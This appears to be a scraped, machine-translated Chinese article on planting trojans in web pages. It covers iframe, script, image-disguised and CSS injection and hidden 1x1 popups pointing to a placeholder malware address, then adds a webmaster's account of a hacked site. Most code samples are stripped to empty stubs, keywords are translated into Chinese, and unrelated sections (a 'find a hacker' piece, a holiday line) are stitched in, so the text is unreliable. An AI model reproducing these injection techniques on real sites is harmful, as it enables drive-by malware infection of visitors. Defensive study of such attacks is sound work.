揭秘黑客们是怎么挂马的（请黑客帮忙做手脚）

揭秘黑客们是怎么挂马的（常见的网页挂马方式）

所谓挂马，就是黑客通过各种手段获取网站管理员的账号，包括SQL注入网站敏感文件扫描服务器漏洞网站程序0day等等，然后登录网站后台传递数据"库备份/恢复"或者上传一个漏洞获得一个webshell。使用webshell修改网站页面的内容，并向页面添加恶意转移代码。也可以通过弱密码直接从服务器或网站获取FTP，然后直接修改网站页面。当您访问添加了恶意代码的页面时，会自动访问转向的地址或下载木马病毒。下面我们来看看几个常见的挂马网站。

1）iframe框架挂马

比如在网页上添加一行挂马程序：

这种嵌入是很常见的，在Google里可能会发现有木马的网页，一般都是这样挂的。这句话是在打开网页的同时打开另一个网页当然，这个网页可能含有大量木马，也可能只是为了骗流量。

如果我们的网页没有使用iframe，我们可以屏蔽iframe属性，这样即使网页被iframe挂机，也不会伤害访问网站的用户。

原理】

IE5及更高版本支持在CSS中使用expression，它用于将CSS属性与javascript脚本相关联这里的CSS属性可以是元素的固有属性，也可以是自定义属性。

我们可以通过向网页添加以下代码来屏蔽iframe属性：

iframe{a :表达式(this.src=’大约:空白’,this.outerHTML=”

Iframe也可以加密，比如下面的代码：

2）script挂马

通过调用脚本挂马，可以直接挂html文件，或者js文件，也可以纯文本挂马为了躲避追查，还有加密挂马的形式，形式各异，千差万别主要方式如下：

这是一个加密的挂马语句；

2.1htm文件挂马：

通过上传一个木马文件(x.htm)挂马，代码如下：

document.write(

document.write(

document.write(

Htm挂马代码:

2.2js文件挂马

通过上传一个木马文件(x.js)挂马，代码如下：

document.write(

JS挂马代码:

当然也可以挂网上任何机器的X.js文件；

2.3js变形加密

3）图片伪装挂马

随着反病毒技术的发展，图片木马技术躲过了反病毒监控的新技术，攻击者也会大同小异：http://www.xxx.com/x.htm中的木马代码被植入x.gif图片文

零件，这些嵌入代码的图片可以用工具生成。图片木马生成后，通过调用执行代码来挂马，是一种比较新颖的方法示例代码如下：

当用户打开http://www.x.com/x.是的，htm在http://www上显示给用户.x.com/x.jpg，而http://www.x.com/x.Htm网页代码也运行。

4）其它的挂马方式

4.1body挂马

也可以在css的体中挂马

body{

background-图片:网址(javascript:document文档文档.write(

4.2隐蔽挂马

top.document.body.innerhtml=top.document.body.innerHTML+

4.3java的开放函数挂马

直接调用：

window.open(x.htm”,”,”工具栏=否,位置=否,目录=否,状态=否,菜单栏=否,滚动条=否,宽度=1,高度=1″

欺骗调用：

页面要显示的内容

functionwww_a_com(

varurl=”网马地址”

open(url,”NewWindow”,”工具栏=否,位置=否,目录=否,状态=否,菜单栏=否,滚动条=否,可调整大小=否,复制历史=是，w

idth=800，height=600，left=10，top=10″

4.4伪装调用：

各种网页挂马，代码都很简单所以互联网木马要想传播，就会不断开发新的挂马方式，不断加密隐藏自己，以此来逃过各种安全软件的眼睛。其实看上面，很多语句都是编程的常用代码，只是用途不同而已知道了网页挂马的原理和方法，防止网页挂马就容易多了。

带有木马的网页主要有两种：一类网站本身就是木马，所有页面都有木马，另一类是正常网站由于管理不善，这里成了木马网站的中转站你看看谷歌里有多少这样的网站可能很多站长还不知道，呵呵，多学学，站长没那么容易。

但仅凭网上挂马的代码，并不一定能传播木马只要我们加强防范，防止自己的网页被挂机，即使我们被挂机打开了木马网页，我们的系统也没有漏洞，木马网页也无法运行。所以最重要的安全防范就是定期给系统打补丁，几乎所有的木马页面都无法工作。

妇女节来临之际，如何解决网站挂的问题？请黑客帮你做一个。
Xf0bLs本期「Eleght科技」我给大家分享一下一些基本黑客术语的分析：肉鸡网页木马挂后门rootkitIPC$shellwebshell溢出注入注入点无杀脱壳命令DDoSARP攻击DOS嗅探漏洞关于黑客的术语有很多很多，也是可以理解的.

1.网站被挂马怎么解决

网站被挂马什么意思解决网站被马的方法。
但是也有很多人走捷径他们用不正当的手段窃取了你的胜利果实。
其中，网站挂马几乎影响着每一个站长。
而且百度挂马后的降级让所有seoer都很头疼。
被马吊起来的事也发生在我身上。
前不久优化的一个站，刚刚稳定了权重和排名结果因为FTP问题，木马连续挂了好几天，网站列表直接从150涨到4300观察了一个月的数据，相信大家都知道突然从150列到4300是什么感觉了，尤其是包括的所有颜色、页面，也能从这些关键词中获得大量的流量。
一个企业站被挂黄页是很严重的。
如何面对这种挂马?首先要做的是联系服务器彻底解决ftp问题，禁止写权限，寻找可能的漏洞。
然后马上删除黄页，跳到404页。
但是4000多页变成了404页，不能说没有影响一个网站的整体相关内容一下子就变了，对于搜索引擎来说不亚于一次网站整改。
对于4000多张快照，我通过网页投诉，希望通过百度删除，但遗憾的是，我提交的相关投诉石沉大海。

2.找黑客帮忙做一个挂

怎么可以找到黑客帮忙呢回家苦读了一个月左右的时间。
首先是天赋，这是常人对计算机理解不到的二是学习而不借鉴他人第三点，也是最重要的一点，精通各种计算机语言你可以每天坐在电脑前10个小时以上，每天10个小时以上在电脑上看很多书，并付诸实践你要有各种异想天开的想法，证明自己的想法年复一年，日复一日，至少10年以上，那你就牛逼了。